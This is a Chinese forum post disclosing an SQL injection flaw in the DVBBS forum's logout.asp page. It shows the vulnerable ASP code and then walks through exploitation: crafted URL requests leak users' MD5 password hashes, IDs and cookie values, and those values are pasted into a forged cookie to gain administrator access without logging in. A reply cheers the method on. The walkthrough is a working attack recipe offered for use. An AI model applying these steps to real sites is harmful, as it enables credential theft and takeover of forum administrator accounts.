动网论坛DVBBS) logout.asp页面存在注入漏洞

动网论坛DVBBS) logout.asp页面存在注入漏洞 logout.asp: /-------------------------------------------------------------------------- <% dim activeuser membername=request.cookies("aspsky")("username") if session("userid")<>"" then activeuser="delete from online where id="&session("userid") Conn.Execute activeuser end if if membername<>"" then activeuser="delete from online where username=';"&membername&"';" Conn.Execute activeuser end if Response.Cookies("aspsky").path=cookiepath Response.Cookies("aspsky")("username")="" Response.Cookies("aspsky")("password")="" Response.Cookies("aspsky")("userclass")="" Response.Cookies("aspsky")("userid")="" Response.Cookies("aspsky")("userhidden")="" Response.Cookies("aspsky")("usercookies")="" session("userid")="" conn.close set conn=nothing response.redirect("index.asp") %> /-------------------------------------------------------------------------- 因程序当中的logout.asp页面对于 activeuser="delete from online where username=';"&membername&"';"并没有做好过滤导致了问题的产生,

动网的完整cookie
userhidden=&password=469e80d32c0559f8&userid=1&userclass=小飞侠&username=aaaaa&usercookies=1
先再吧它拆开来看看
userhidden=
password=469e80d32c0559f8
userid=1
userclass=小飞侠
username=aaaaa
usercookies=1

再url后面加上userpassword,(一定注意后面有个逗号）可以返回与列表用户相对应的
mdb5的密码
http://www.XXX.com/asp/dvbbs/ ... &N=2%20userpassword,
返回：
document.write(';□';);document.write(';18e071ccfb2d1c99';);document.write(';
';);document.write(';□';);document.write(';acd5fdfea300e88a';);document.write(';
';);

这样构造cookie的信息我们就搜集到2条了，相同的道理我们将userpassword换成我们
需要的信息的名字就可以得到我们想得到的数据，具体如下：
http://www.XXX.com/asp/dvbbs/ ... &N=2%20userid，得到userid号码
http://www.XXX.com/asp/dvbbs/ ... &N=2%20userclass，得到class的数据
http://www.XXX.com/asp/dvbbs/ ... &N=2%20usercookies，得到cookies的数据

将所得到的数据替换已经存在的cookie的对应数据然后保存cookie
打开ie连接论坛不用登陆，上去就是管理员

楼上的分析利用偶喜欢，哈哈